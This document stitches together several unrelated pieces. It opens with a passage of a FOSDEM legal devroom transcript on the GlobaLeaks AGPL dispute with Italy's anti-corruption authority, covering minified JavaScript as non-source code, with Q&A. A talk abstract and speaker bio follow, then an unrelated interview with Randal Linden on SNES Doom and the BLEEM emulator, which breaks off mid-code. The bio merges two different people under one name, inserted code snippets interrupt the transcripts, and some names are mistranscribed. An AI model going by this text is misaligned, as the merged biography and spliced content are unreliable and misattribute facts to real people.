the software, which is strikingly the opposite of what we all learn and something we have not heard in the last 20 years.
So, going forward and trying to explain again my position as a somewhat expert in this matter, writing books, writing articles, being an editor of a review, general counsel of a foundation, teaching things at the university, in a master course and a university degree, they came up with something more elaborate, like: oh, the EUPL is compatible with the AGPL because there's a blog saying that. Actually there was a blog reporting that the EUPL is compatible, but without mentioning in which direction, so inbound, outbound, both? No explanation. Actually, the official documentation of the EUPL quite well explains how to combine EUPL code with the AGPL, but it was in English, information possibly behind a linguistic barrier. So that is the lack of easily consumable, maybe translated, documentation of the basic concepts that we have been teaching and practicing every day. In a compliance exercise it's important, and indeed in any compliance effort we are making, we are offering a basic crash course, a 101 course, on IP, software copyright and copyleft concepts, so that we have a basic understanding even for technical people. And actually this dev room, the legal dev room in a technical and community event such as FOSDEM, goes in the right direction, and I praise those who brought the idea of a legal dev room. Second lesson: there is still a misconception about what source code is. We said, you are not distributing the source code of the interface, and they said, no, look, there is source code, you can read it. Well, that is a misconception derived from a lack of knowledge of what minification is. The file was minified, and I will leave it to my colleague Alberto, who is going to dig deeper into this aspect. Alberto, please have your presentation. Thank you very much Carlo, and hello everyone. I appreciate that most of you may be familiar with the concept of JavaScript minification, so please forgive me in advance if some parts will sound commonplace to some of you. It's just to get a non-technical audience to understand. So basically our claim about the JavaScript part of OpenWhistleblowing was based on the fact that, unlike in the original repository, the source code offered for download by the defendant was the JavaScript front end of OpenWhistleblowing as served: minified in some parts, everything concatenated into a single huge file. The defendant contended that this was still a source code distribution and that it was compliant with the AGPL requirements. Obviously we claimed that this was not the case. How does the notion of source code held by the defendant compare with the legal definition of source code provided by the AGPL? Well, the AGPL, as we all know, defines it as the preferred form for making modifications to the code itself. Following this definition, a single huge minified JavaScript file cannot be regarded as source code. Why? Well, the first fundamental notion here is that JavaScript is an interpreted programming language. Interpreted means that JavaScript doesn't need to be previously translated into machine language in order to be executed but, as the word says, it is translated into machine language by the computer equivalent of a real-time interpreter and immediately executed by the machine itself. This is indeed very different from the distinction between object versus source code in compiled programming languages like C, Java and others, where human-readable source code needs to be previously compiled, and therefore translated into machine language, in order to be understood and actually executed by the machine itself.
As we all know, with compiled languages a software program may be distributed in two different forms: source code form or machine code form. The latter may also be called, depending on the context, object code or executable code. On the other hand, technically speaking, with interpreted languages we normally distribute only source code. There is no such thing as object code distribution in interpreted languages, and this is the case also with JavaScript. Well, actually some modern JavaScript interpreters do compile code before executing it, but such compilation is intended just for browser-specific internal use and not for distribution, so the conclusion doesn't change. Summing up, technically speaking the defendant was right. Whatever you do with JavaScript, you always end up with source code. It's materially impossible to distribute JavaScript object code because it simply does not exist in that form. But does this hold also in the legal field? To answer, we need to make a step forward. While JavaScript cannot be distributed in compiled form, it can be minified. What does that mean? I will make you the same example that we made to the judge at the trial hearing. What you see on the screen now is a simple code snippet written in JavaScript. It's a simple function that returns user data given their ID number. What this code does is straightforward to anyone who reads it, because the function and variable names just tell it: get user data, user ID, get user and so on. It's almost like plain English, and if there's any doubt left, the comment that you see in the code qualifies it. But let's assume that this code for some reason is too long and takes too long to download and execute. Since function and variable names are arbitrary, we can just substitute them with single letters. And since comments are not executed and are simply ignored by the machine, we can just strip them out. The result may look more or less like what you are seeing now on the screen. So this essentially is what minified JavaScript is all about. To save space and to speed up code download, comments and white space are stripped out and function and variable names are replaced with random letters, so the code gets much shorter and lighter to download. The problem is that now the code looks totally incomprehensible. For a machine, the two codes are functionally equivalent. But for a human, the first one is something that one can understand and possibly modify, while the second one is something that could be understood and modified just in theory, but in practice it would be as difficult as solving a very complicated puzzle. Most software developers wouldn't even try. So is that still source code? Technically speaking, yes, since it still needs to be interpreted in order to be executed on a machine. Is that object code? Technically speaking, no, since there is no such thing as object code in JavaScript. But legally speaking, things are different. All GPL licenses, namely GPL, AGPL, LGPL, at section one provide that, I quote, the "source code" for a work means the preferred form of the work for making modifications to it; "object code" means any non-source form of a work. So given these definitions, the answers to the above questions completely change. Is JavaScript minified code still source code in GPL and AGPL parlance? No, because it's definitely not the preferred form for making modifications. Is it object code? Yes, because it does not fall into the above definition of source code.
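For readers following along without the slides, here is a minimal sketch reconstructing the kind of before-and-after pair Alberto describes showing on screen. The exact code from the slides is not in the transcript, so the function names, the sample data and the lookup logic here are illustrative assumptions; the point is only the contrast between the readable form and its minified equivalent.

```javascript
// Hypothetical in-memory user store, just to make the example self-contained.
const users = {
  42: { id: 42, name: "Ada", email: "ada@example.org" }
};

// Original, human-readable form: the "preferred form for making modifications".
// Returns the user data for a given ID number, or null if the user is unknown.
function getUserData(userId) {
  const user = users[userId];
  return user ? { id: user.id, name: user.name, email: user.email } : null;
}

// The same logic after minification: comments and whitespace stripped out,
// function and variable names replaced with single letters. It behaves
// identically for the interpreter, but it is no longer a form a human
// would prefer to read or modify.
const u={42:{id:42,name:"Ada",email:"ada@example.org"}};function g(a){const b=u[a];return b?{id:b.id,name:b.name,email:b.email}:null}

console.log(getUserData(42)); // { id: 42, name: 'Ada', email: 'ada@example.org' }
console.log(g(42));           // same result from the minified form
```

Running either form gives the same result, which is exactly the argument being made: the two are equivalent for the machine, but only the first is the preferred form for making modifications in the sense of the license text quoted above.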
So the final question is: am I violating the GPL if I distribute GPL JavaScript code only in minified form and I do not even offer to provide the original non-minified code? Yes, I'm violating it, because I'm not complying with the obligation to provide the full source code. It's just as simple as that, but it's something that is often overlooked by developers, and not only in this specific case. The distribution of JavaScript code only in minified form is something that we often see in our open source compliance practice. But when the license is GPL, this is simply something that one is not allowed to do. And this is so not only because it was our position in this case, but because it is a clear-cut statement of the GPL that cannot be subject to different interpretations, and it probably will hold true also for other licenses that do not explicitly define source code. Actually, in our case the defendant had to admit that in the end, and we finally obtained the true source code of the OpenWhistleblowing front end, non-minified, divided into smaller source files. Now just let me pass you back to Carlo for the conclusion of the case, and thank you for your attention. Oh, thank you Alberto, that was really informative. And the final point I want to touch upon briefly is on the additional conditions that GlobaLeaks has attached to the AGPL. So the AGPL was not vanilla. We had the authority restore the AGPL despite it having been terminated, but that is another story. They used the exact version taken from the Free Software Foundation website. Here there was a contention by the State Attorney, not on whether the actual disclaimer, the reasonable notice that we wanted to have restored, was or was not complying with section 7 of the AGPL, but they contended that the version they had ported from did not contain the mention that we required. Actually we were lucky, because on the one hand we kept a copy of the repository that they had ported. Actually, they hadn't ported the repository: they took the code and put it into a single large commit with everything already done. But we had the original version with the commit history. On top of that, we were able, there was no chance to show it because we have a settlement, but we were able to trace the history of the repository and the dates when the repository was added, because Software Heritage had made a snapshot of that repository and we were able to retrieve it from a third party, a reliable third party. Now, this is also a problem that we would have faced in case we hadn't been able to just prove the timeline. Of course the logs in the git repository have a date, but there is no trusted timestamp. So it's difficult to prove that a certain modification occurred at a certain time. Of course you can trace the history, but the history can be altered. There are many articles out there and suggestions as to how to prove how a project evolved. Of course, if the project is public you have many witnesses and people copying and cloning the same repository over and over, but actually having one single true source of authority as to the timeline, that is also a good idea, especially in case you decide to switch to another license, as GlobaLeaks did in practice. So it was a long story; perhaps the case was lucky enough to be brought to a happy end, as I said, through a settlement, and all is well that ends well. Eventually we had a very good relationship with the authority after we showed that we were not there for money or for prestige, and they stuck to the agreement to the letter.
It was a costly exercise in terms of time: my personal time, Alberto's, Giovanni Battista's, and other people like Marco Ciurcina, I want to mention him. He was not in the case, but he was helpful in trying to establish connections and to relay the right messages to the right people. And it was also costly on the monetary side. My time was partly pro bono, Giovanni Battista's and Alberto's partly pro bono, and there was a cost connected to the application, but at the end of the day it's possible to go after even big guys, for a small project, like a state, actually a branch of the state so to speak, and win and bring home a good result. So I want to thank you for your attention. I want to thank the FOSDEM organizers and the dev room organizers for having us. It was the first time we could speak publicly about this topic, and thank you to my co-hosts Alberto, Fabio and Giovanni Battista. We remain available for any further queries, questions, curiosity. We are sticking around here for some minutes longer. Please don't hesitate. Meanwhile, see you next time. Bye. So one of you has the audio still going. Please mute it. All right, thank you so much for doing that summary and that presentation. I think that was really useful to the audience. We had some great questions coming in. Somebody on this panel needs to mute their audio from the broadcast room. But okay, so the first question: are you all the legal team that worked on this? Was that all of you? Oh, that's a good question. Actually I made some obscure comments or questions on the chat. Actually we completely forgot to mention that there was a lady, a lawyer, a very fine lawyer, helping us with, unfortunately, the leg work without the spotlight on her. She was very helpful and she has done the actual filings and stuff. So I forgot to mention her. I wanted to give her credit. She was on the record as a lawyer and she is also an AC lawyer. And so I wanted to mention her too. Marco Ciurcina was not on the record, but he is a fellow at the Hermes Center and he has also been giving suggestions; he was suggesting to be quiet, patient, and then everything will be good at the end. So we have a bunch of good questions that the audience came in with. The first one, I'm just going to go by how they are upvoted, since that way the audience has a chance to weigh in on what's asked. So the top question is from Bikun. It was: do the speakers think that the AGPLv3 Section 5(a) required disclosure of the commit history, for example, the Git repository? This is not the first time this question has been asked in this context. I don't think so. I think that could be helpful and it's a way to show this. But consider if the same source code were circulated as a tarball; there is no way to do that, and using this as the way to make the comments and make the notices would mean that everybody would have to also do the same. That would be quite cumbersome. I think the notices should go in the source code, alongside or complementing the distribution of the source code, because the history could be easily stripped out, even involuntarily. Conversely, if you make the notices in the source code, you make sure that everybody would just have to download the source code and then redistribute it and upload it, not necessarily on the same fork or a clone of the same repository. Yes, if I may add something on this also: the thing is that you are legally required to state your copyright, but the authors of the commits are not always the copyright holders.
If they work for a cooperation, the copyright is owned by the company. So it's not exactly the same information. Does anybody else want to add anything? Okay, so the next question is, if you could all change the definition of source code in AGPLv3, what would you do? Or do you think the current definition is perfect? I cannot see any major flaws. I think defining it by its purpose, it's the best thing. Because as long as you go down in redefining better defining it, I think you will wish to leave something obvious outside and not coping up with evolution. Of course, that was made with C-like languages and not interpretive languages. But I think it's still quite a good one, at least if you are conversing with technology with software development. The problem we have here is that there was some bad faith on somebody and some misunderstanding on other people not knowing that, being able to read somehow the code wasn't the requirement. But if they had looked at the requirement of the AGPL, that would have been much more simple and straightforward, I think. I just wanted to add a little comment to say that the case and what Alberto stated is a testimony that this definition is a very short one. It's very good also because it clearly says what source code is and especially says what that the non-source code is the object of. So this kind of definition doesn't leave any room for any different interpretation which may confuse when it comes to languages as JavaScript. That's not related to this, but somebody has already pointed out that I still forgot to mention this lady, a lawyer helping us. Her name is Elisabeth D'Affamio. So it's not the same, Fabio is the family name, not like Fabio Petrosantius. She's Elisabeth Fabio. She used to work with me and she will still cooperate. Does anybody want to add anything about the definition in AGPL? All right, so is there some place that we can read all about this? Are you going to do a blog post where you talk about the whole story in details? I think the Herb Center has some of the story, at least until we start to string in little documents. We consider to discuss it in a better detail what happened. Of course, we cannot exchange, we cannot reveal the actual communication. Neither are we allowed to share the actual documents. In case it ended with a public decision that would have been public, but the other documents are not public, it cannot be disclosed. With that having time and finally the good key, it will be a good idea for us to say something about it and having this presentation is the best, the closest thing we could think of without writing something. I think that it would be a very interesting exercise to publish a joint handout of the case with anti-corruption authority. In order to foster compliance and in order to avoid similar mistakes in the future, it would be very, very interesting also in the spirit of collaboration with public authorities. I don't know if Fabio wants to add something on it. Yeah, so as all the friends that in this talk that we did the journey with within this AGBL litigation, my personal, activist soul were always kicking to push publicly and transparency and transparently any kind of document that we were exchanging with the authority counterparts because a non-software expert answer can make you smile a lot. 
But I understand that for a greater good, it was best to find an arrangement and in such a case, I would like to say that our activist spirit, that's also about embarrassing public agency when it's worthwhile, was put to a narrow level for the true greater good achievement. The first one was that we are aligned with the social purpose of anti-corruption authority in the fight of corruption. So we are allies, we are not enemies. And that was a mistake because of a lack of knowledge related to software copyright and the specific aspects of open source software licenses. And the second, it's also about the fact that in Italy, we have a very decent law on news and that the public code, public money concept, it's by law applied in Italy, but is not yet being applied every day by public agencies. And so creating a lot of noise about an error, a mistake by a central public agency in doing something good, that's about publishing the modification of a free software, would that be counterproductive in our common action in making public agencies push their software with free license. So I wanted to underline that because we realized that the case has been big and there was also a big opportunity to make a lot of noise, but we decided to work under the line to achieve such a greater good. So my, I'm curious about whether the rules are the same as in Germany. I see Braille is asking the same question. But from our experience, sort of, I know a little bit about Germany because of the VMware case. So I was wondering, is it the laws that require the filings to be private? Is that like, is that a, you know, mandated that any of the filings be non-published until there's a final decision? And then once it's there's a final decision, can you publish all the documents? No, no, actually, you can, you're not supposed to be publishing also the documents. Sometimes that would be interesting to, in general terms, I mean, especially the finance meetings where you sum up all the case and make all the most thorough explanation of your case and stuff. But that's not, it's not really in the law. There is a general understanding and by bar rules and data protection also, that is something that you're not supposed to do. Only the decision, which in turn will bring much of the information required and the interesting stuff, but the judge is somewhat in a position to be reporting correctly the position of the parties. But apart of that, there is no transparency at all for everything that has gone through the case. Actually, I'm working for a legal publisher and they will be keen on also publishing the finance meetings because sometimes they are very well written by very high level lawyers, even Supreme Court, and they are not available to anybody at all levels, including Supreme Court. That's a pity. Yes, sir. And also, sorry, and also in this case, there was only a request for a preliminary injunction, so there was no final decision which would have been published. The final decision would be, maybe it would have been published, not for the preliminary injunction, but for the final judgment if it ever would have ended without a settlement. So in this case, everything was quite private and would be like that. So the next question is from someone with the handle of Donix. And the question is, how do you afford to take this pro bono and how long did it take? It's not been so expensive, I mean, in terms of time. 
It was quite expensive and it required a lot of hours put into it, but eventually it's something we all do as part of our contribution back to society, for making a decently good return on our profession. In the time span between when we started and when we reached a settlement, it was more than 18 months. It was like 10 to 12 months before actually deciding to go to court. And then unfortunately there was COVID: we were supposed to have a hearing in March 2020, but that got adjourned by three months because everything was shut down. And that was really hard also to discuss, because we couldn't go to court. We had to do it remotely, and the judge wasn't available to have any live discussion; we were supposed to have only a very short discussion. That's quite interesting, because we were not allowed to file a full rebuttal to the reply of the other party. So we were just supposed to say, state your case, what you want, and that's it. And at that point we had to say, okay, we propose to end this with a settlement, because we were close, of course. And there was no chance to reply in every detail. In terms of hours, frankly, I didn't keep any count of it, but I would be perhaps in the 80 to 100 range, I don't know. So the next question is, and this is for Max Mel: do courts generally accept Software Heritage as a source for evidence? Oh, generally I cannot state it, because it never happened to me to have to rely on that. But sometimes I have filed other sources like that. So it's not legally valid, I mean, it's not binding, but the judge can take any source of evidence as evidence. The rule is the free and unfettered evaluation of the judge. So there is no formal rule for what is evidence and what is not. I mean, there are rules on witness evidence, there are rules on what is legal evidence, but in general everything can be evidence. If it comes from a third party, like a newspaper, like a log, or somebody who keeps such records and is not related to you, it's even more valid, effective and convincing. That's the key: to be convincing and not related to one of the parties. So, there we are. This is another question we had in the channel: were there any discussions of installation issues in the discussion with the violator? No. What can be the angle here? Maybe, Carlo, it's about referring to the installation scripts or the packaging scripts. Because, if you remember, we had also some support files that were not present. That's possibly one of the items related to installation. But it's worth saying that OpenWhistleblowing, the name of the fork with this AGPL violation, was packaged for use on Red Hat systems, with RPM packaging, while GlobaLeaks is packaged for Debian and Ubuntu and so on. And what we found out is that the packaging scripts were missing. Maybe that is one point related to the installation. It's worth saying that five days after the anti-corruption authority released the AGPL-infringing version of their software and made a public announcement, so that organizations such as the Bank of Italy started adopting it, in other words spreading the violation itself, we released a 15-page technical document saying what the technical issues were and the technical considerations when comparing the two editions of the software. Without any comments on quality, but based on technical, factual analysis.
In order to let the technical community make their own evaluation, because we had a monoclonal comment, and it's currently the same situation, but now everything has been cleared that there were those two software. The one recommended by the anti-corruption authority and the one based on the GlobalX one made by the Hermes Center that was three years ahead in development. So a public agency, which of the two software had to choose? And that was a problem, let me say, of a narrative of installation. And what we did is to produce technical documentation to let people evaluate and judge on a technical basis. So here's another question from an audience member named Borger. And the question is, the license states that the original source code must be supplied when asked, but are there any rules, and I would say with an Italian focus, to how it should be provided. Public repository on GitHub may seem obvious, but could it also be provided printed on paper, for example? Okay. In our case, there was no question on how, because everything was provided actually in everything which was provided was provided on the GitHub repository. They were part missing, but there was no question of unwillingness to supply the source code. They felt short of their obligation and they provided something different, but no question about it. In paper, that would be quite impractical, and that would not, in my understanding, meet the requirement of the preferred form, because a file that you can modify, not something that you have to scan or otherwise. If it's a hello word, perhaps, but anything more than that, I would not say that is the preferred way to modify. And by modifying, modifying with other people, exchanging with other people, I think it's an interesting question, but the answer is definitely no. Well, if we may just add that in this case, we are speaking about AGPL, so it means that anyone interacting through a network with a software application must be able to obtain a copy of the source code and the license. So that means being made publicly reachable by who can interact over the network with the software that implicitly say put it digitally somewhere online. So I've got another question I'm going to ask before I do that. I want to thank the panelists for joining us, and I'm going to ask the question and we're going to move over to the private room and anyone who wants to join, it's becoming public, and so anyone can join and continue this conversation. So thank you so much. Thank you.
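As a practical footnote to the last point about network users: one common way to meet the AGPL's expectation that anyone interacting with the application over a network can obtain the Corresponding Source is simply to have the application itself serve a link to the source of the exact version being run. The sketch below is a hypothetical illustration, not the GlobaLeaks implementation; the version constant and URL are assumptions.

```typescript
// Hypothetical sketch: expose the Corresponding Source of the running version to
// network users, in the spirit of AGPL-3.0 section 13. Names and URL are assumptions.
const APP_VERSION = "4.2.1"; // assumed to be injected at build time
const SOURCE_URL = `https://example.org/source/app-${APP_VERSION}.tar.gz`; // placeholder URL

export function licenseFooterHtml(): string {
  // Rendered on every page served over the network, so remote users see the offer.
  return `<footer>
  Licensed under AGPL-3.0-or-later.
  <a href="${SOURCE_URL}">Corresponding Source for version ${APP_VERSION}</a>
</footer>`;
}
```

Keeping the link tied to the exact deployed version makes it straightforward to show that the full, non-minified source being offered really corresponds to what users interact with.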
|
Globaleaks is an AGPLv3+ SaaS application for anonymous whistleblowing, developed by the Hermes Center. After receiving a prototype, the Italian Anticorruption authority (ANAC) re-published a version under EUPL, modifying attribution & copyright statement, removing reasonable notice from GUI, and failing to fully comply with source code obligations. The controversy was brought to Court and eventually settled, restoring the correct license, and patching the other issues. Several lessons learned. Fabio Pietrosanti - Naif (Project leader) - Fabio Pietrosanti has been part of the hacking digital underground with the nickname “naif” since 1995, while he’s been a professional working in digital security since 1998. President and co-founder of the Hermes Center for Transparency and Digital Human Rights, he is active in many projects to create and spread the use of digital tools in support of freedom of expression and transparency. Member of Transparency International Italy, owner of Tor’s anonymity nodes, Tor2web anonymous publishing nodes, he is among the founders of the anonymous whistleblowing GlobaLeaks project, nowadays used by investigative journalists, citizen activists and the public administration for anti-corruption purposes. He is an expert in technological innovation in the field of whistleblowing, transparency, communication encryption and digital anonymity. As a veteran of the hacking and free software environment, he has participated to many community projects such as Sikurezza, s0ftpj, Winston Smith Project, Metro Olografix, among others. Professionally, he has worked as network security manager, senior security advisor, entrepreneur and CTO of a startup in mobile voice encryption technologies. Copyright, Criminal, Data Protection/Privacy and IT law are his main areas of expertise. In the last years, he is devoting a significant part of his practice to the legal aspects of UAVs (drones) After a cum laude degree in Law in Italy, he moves to Great Britain for the Master of Laws in Maritime Law e Information Technology Law at the University College London - UCL. Afterwhile, he earns a PhD. In 2009 he obtains the European Certificate on Cybercrime and Electronic Evidence (ECCE). He is ISO 27001:2013 Certified Lead Auditor (Information Security Management System). Member of the Bar of Cagliari since 1996, admitted to the Supreme Court since 2009, Data Protection Officer, he is a fellow of the Department "Informatica Giuridica" at the Università Statale of Milan where he teaches in the Post-Graduate Course in Digital Forensics and cybercrime. He also teaches at the Master for Data Protection Officers, organized by the Politecnico of Milan. Fellow of the Nexa Center on Internet and Society and of the Hermes Center for Transparency and Digital Human Rights. Author of several publications on the above mentioned areas and speaker at the main national and international congresses, he sides his legal profession an intense teaching activity, mainly in the field of copyright, Free/Open Source Software, data protection, IT security, digital forensics and drones.
|
10.5446/53640 (DOI)
|
Computer, it says recording, so I'm guessing it's recording. So for the people watching, welcome to this very, very interesting thing, an interview I guess, for FOSDEM. I have this one with Abdul Radi, I'm the second most interesting person in this interview, and with me here is, how to describe him, well, let's just say a legend, and it's my honor and privilege and extreme, extreme pleasure, because I'm a huge fan, to introduce Mr. Randal Linden. Thank you very much, that's quite an introduction, I'm very, very flattered. Yeah, I've been rehearsing it for like a week, but excellent. No, it's good, it's very flattering. I've been very, very fortunate and very, very lucky. I got my start when I was very young. I had my very first program published when I was 13, on the Commodore 64. It was a Centipede clone, because back then arcade games were the in thing, and I made a Centipede clone on the Commodore 64, and it was all done in 6502 assembly language, because back then there wasn't really a C compiler (the language hadn't really come into its own yet), and so everything that you wrote on the Commodore 64 was either written in BASIC or it was written in 6502. And so I've been a programmer now, as of two weeks ago, for 38 years. Congratulations, I would say. Thank you. I've worked on Commodore 64, Commodore 128, I've worked on the Amiga, I've worked on PCs, I've worked on Macintosh, I worked on Nokia Symbian phones, I've worked on Android, I've worked on iOS, I've worked on Amazon Fire devices, I've worked on embedded systems, and I've written a wide range of software. I've written some video games a while ago. One of the most famous things that I've written, which is what we'll talk about today, is called Bleem, but I also wrote the very first full-screen, color, streamed-live-from-disk animated game on a home computer, called Dragon's Lair, and I did an Amiga version of that, and it was originally on a laser disc, and the whole program fits into 8K of 68000 code. So the entire program for Dragon's Lair is this tiny, tiny, tiny little program. This is just the code without the assets, of course. That's correct, just the code without the assets. Back then, the assets, all the original source material, the digitized material, fit onto a massively huge 40-megabyte hard drive. That was the data; back then, I think it was a Conner drive, it was enormous, and these days the laptop that I'm talking to you on right now has 8 terabytes of storage, compared to which the 40-megabyte hard drive is minuscule. But coming from the Commodore 64 and the Commodore 128, one of the things that I learned very early on was how to keep things nice and compact and optimized, and I think that really helped direct the projects that I've worked on, and in particular, it was very helpful with BLEEM to make it possible to do some of the stuff that it did. The Centipede clone, was that like in a magazine back then? That was the way to go? No, actually it wasn't. It was actually sold, and it was sold on, well, if we weren't in the time of COVID, I would be talking to you from Seattle, and I would actually be able to hold up and show you the floppy disk, the 5.25-inch floppy disk, and the cassette tape that Bubbles was sold on, because the Commodore 64 had a 1541 disk drive, and it had a cassette tape drive as well. So it was actually a real commercial product, where you could go into a store back then.
The only stores left these days are like EB games, but back then on every corner there was a store that had usually Commodore 64s or Amigas, and you could go into one of these stores and actually buy it. And yeah, like I said, that was a long time ago, almost 35, 45 years, long time ago. Good times, good times. So yeah, I don't know. Like I said before the video, I'm still a bit nervous, but I'll get over it a little. No, don't be nervous. But this is amazing. So yeah, so like I mentioned, one of our emails, I'm a big fan of Doom, and you worked, yeah, everybody, not everybody, but most people do, of course, it's amazing, and you worked on the amazing Doom port for the Super Nintendo. Yes. Yes. So I had started the project. I was actually working at a company called Sculptured Software at the time, and I was working on a monster truck rally game, which ended up never seeing the light of day. But it had these huge monster trucks and erased monster trucks. And at the time, the Super FX had just been announced by Nintendo. And we went to a Nintendo developer conference where it was all top secret, and they showed us at the time, Star Fox running. And everybody was so amazed that here was the Super Nintendo doing 3D. It got a standing ovation. And Sculptured had decided to do a game called Dirt Tracks FX, which is a dirt track racing game for the Super FX. And while that was in development, I ended up developing a whole development chain, an assembler, a linker, a source level debugger for the Super FX that was based on a hacked up Star Fox cartridge. We hired an electrical engineer to basically take apart the Star Fox cartridge and replace the ROM with a tiny little boot ROM that was an EEPROM and RAM. And so I then wrote a bootloader that communicated to the development system, which was based on the Amiga, that allowed you to download code to the RAM. And the whole reason all of this was done, all these complicated steps, was because there was no development system available. And the only way to get access to the Super FX chip was through the Star Fox cartridge. Because you could just go to a store and buy one. And so that's pretty much what we did. We went to the store and bought one. And the electrical engineer made this huge breadboard thing with wires and stuff coming all over the place. And all it basically did was replace the ROM with RAM. So you could download to it. And as it turns out, I have recently released, I guess maybe six months now or so, on my GitHub page. Actually, you can go to Randall Linden, R-A-M-D-A-L-L-I-M-D-E-N, all one word, dot com. And it redirects to a link tree page. And one of the links is for GitHub. And on GitHub, you can now download the entire source code for the Super Nintendo version of Doom. And you can also download the Amiga-based tool chain, which runs, if you're familiar with emulators, WinUae for Amiga. And you can actually build Doom for the Super Nintendo. I don't have the assets included because of copyrights and ownership issues. But all of the code is there. And people can take a look at it. Yeah, OK. One thing that really interested me about this particular, we should move to the other thing, the emulator thing a bit. But I can't resist, right? But one thing that really interests me was because Doom was written in C and you rewrote the whole thing in assembly. Right? Yes, yes. I had never seen the code for Doom. 
But I knew that the Super Effects, based on the technology and the speed and the Super Nintendo, I knew that it would be capable of making Doom. And so I wrote my own engine that did a very similar thing as Doom on the PC does, as far as the way that it internally operates. But it's all written in Super Effects GSU 2A code. And the rest of it is a tiny little bit of 65816 on the Super Nintendo that basically handles joystick input, DMA transfers, starting and stopping the Super Effects. But the game itself is, it's all written in assembly language. And it's all written in the Super Effects assembly language. It's a risk processor. It's very, very cool. It's one of my favorite architectures ever. And I've written on 6502, 68000, DSPs, 65816, 386. I've written for FPUs and GPUs and a whole bunch of other things. And the Super Effects chip design is one of the most elegant, efficient processors that I've ever seen. It's really quite a marvel. And so yes, if you go to GitHub, GitHub analyzes the code and it shows that it's 98% assembly language. And the reason that it's not 100% is because I've also included all the tools. So all the processing tools and all of those were written in C. Okay, okay, okay. Yeah, that was very interesting. So yeah, I have so many questions, but we shouldn't really talk about this, but it's so interesting. So the last thing I'm going to ask about, you know, let's talk about this afterwards. So I've got lots of time. I've allocated the whole afternoon for you. Thank you. Thank you very much. My pleasure. Let's see. Should we move on? Okay, so last question about this. So basically you actually wrote the game from scratch. It wasn't actually a port like many people think. Oh, okay. It was a totally original engine. Totally original technology. I reverse engineered dooms assets. So I saw how all of the artwork fit together. I wrote my own tool chain so that you basically could take doom assets run through the tool chain and it converted it into my format for my engine, which I call the reality engine. But yeah, it's not a port. It's a completely unique original engine that was custom made for the Super Nintendo and the Super effects. And as it turns out, since the source code release, there's there's a couple of message boards that have talked about it. And somebody came up with a brilliant idea that I wish I had thought of back when doom was was released. And that is to use the Super effects mosaic. Basically what it does is it takes pixels and it duplicates the pixels for a mosaic style effect. The doom engine that I wrote can render single pixels. But I ended up doing double pixels because it cost half as many cycles to horizontally double the pixels. And if I had thought about it a little more at the time, I would have used the Super Nintendo mosaic to do the pixel doubling in hardware. And I would have been able to write half as many pixels to RAM and almost doubled the frame rate. Okay. That's interesting. Yeah, it's well, it's it's it's if anything it's proof that no matter how good you think something is, there's always something there's always a different way and unique perspective. There's always, I like to say, always better code out there. I'm pretty pleased with the result because I think it was a technical achievement. But I also recognize that there's lots of room for improvement. 
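For readers who want that pixel-doubling trade-off spelled out: the released game writes every rendered pixel twice to fatten it horizontally, while the idea raised after the source release is to write each pixel once at half width and let the SNES PPU's mosaic feature replicate it in hardware. The sketch below is a conceptual model in TypeScript, not Super FX assembly; the buffer names and sizes are assumptions for illustration only.

```typescript
// Conceptual model of the trade-off described above (TypeScript, not Super FX assembly).
// Sizes and names are assumptions; the point is the number of writes per source pixel.
const HALF_W = 108;   // assumed half-width of one scanline of the 3D view
type Row = Uint8Array;

// What the shipped game effectively does: double each pixel in software,
// so every source pixel costs two stores into the render buffer.
function writeRowSoftwareDoubled(dst: Row, src: Row): void {
  for (let x = 0; x < HALF_W; x++) {
    dst[2 * x] = src[x];
    dst[2 * x + 1] = src[x];
  }
}

// The post-release idea: store each pixel once at half width and let the PPU's
// mosaic feature replicate it, so the Super FX does roughly half the RAM writes.
function writeRowForHardwareMosaic(dst: Row, src: Row): void {
  dst.set(src.subarray(0, HALF_W)); // one store per source pixel; hardware widens it
}
```

Halving the stores into the render buffer is where the "almost doubled frame rate" estimate above comes from, since those writes dominate the inner rendering loop.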
And as I said, it wasn't until I released the source code and people were digging through it, and somebody had come up with this really unique idea of, oh, you can use the mosaic on the Super Nintendo hardware and it's like, oh, yeah, I wish I had thought of that. But you know, in retrospect, everything is easier. So exactly, exactly. It took 20 something years to come up with a better way of doing it. So in the big picture, it's not so bad. It's possible. It's possible. But that's amazing. That's amazing. Right. Thank you. Yeah. So this is one of the one of the things I shouldn't really talk about myself a lot. But you know, so one of the things is when I was worrying about this interview, you know, and, you know, we prepare some questions and and and I sent them over and and I was thinking, you know, so every one of these questions, we could talk like two hours about, which is interesting. But, you know, it's, I don't know if, yeah, if, you know, if we can, we can, you know, put that video up in the conference. They won't accept it. But we can start our own conference. So it'll be long that while there's a lot of as it turns out, one of the unique things about about Gleam and the PlayStation. This was back in the day when there was a lot of parts, a lot of pieces to the system. These days you've got your your GPU and you can just send down millions of polygons and textures and all that stuff is just sort of done for you. But back in the days of the Nintendo and the Super Nintendo and then the PlayStation, you really had to orchestrate and organize all of the parts, all of your graphics and your sound and your CD tracks and and your code and it had to be optimized and there's a lot of parts to talk about as far as the actual emulator goes. But then there's the whole topic of emulation in general and and how far things have come. If if anything, I think these days emulators are both easier to write and harder to write because the hardware that's being emulated is so state of the art. But they're easier in some respects, I think, because you can do a lot more high level emulation. The low level emulation is where you're sort of you're emulating the processor and you're emulating certain chips and a higher higher level emulation is is where you you know something about what you're emulating. You know something about the target device that's being emulated like it's sending down a polygon and that's sort of how BLEEM operated BLEEM knew that that when a PlayStation game did a certain sequence of operations, what it was really doing was sending down polygon coordinates to the GTE and so instead of necessarily emulating all of the really low level chip, you know chip based components, large chunks of BLEEM were emulating the intent of the PlayStation rather than the actual underlying operation of the PlayStation and that's why BLEEM could do things like especially shown off in BLEEMcast on the Dreamcast where it could really enhance the game because BLEEM wasn't trying to be a PlayStation. It was trying to do what the PlayStation did but targeted for the platform on which it was running. So on PCs that meant if you've got a 3D graphics card which back then 3D graphics cards were rare this was back in the days when you had I want to say rendition, verite, there was Voodoo, 3DFX, the diamonds, the creative cards, all the good stuff. Back then you had six or eight manufacturers that were all trying to compete in the 3D space as it was developing. 
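A sketch of what "emulating the intent" can look like in practice: rather than rasterising a PlayStation-style triangle command into an emulated VRAM, the emulator decodes the command and re-issues it through whatever 3D API the host has, optionally at a higher resolution. This is only a conceptual illustration in TypeScript; the command layout, the interfaces and the drawTriangle callback are assumptions, not BLEEM's internals.

```typescript
// Simplified sketch of high-level emulation of a shaded-triangle command.
// The packed word layout and the HostRenderer interface are assumptions.
interface PsxVertex { x: number; y: number; r: number; g: number; b: number; }
interface HostRenderer {
  drawTriangle(v: [PsxVertex, PsxVertex, PsxVertex], translucent: boolean): void;
}

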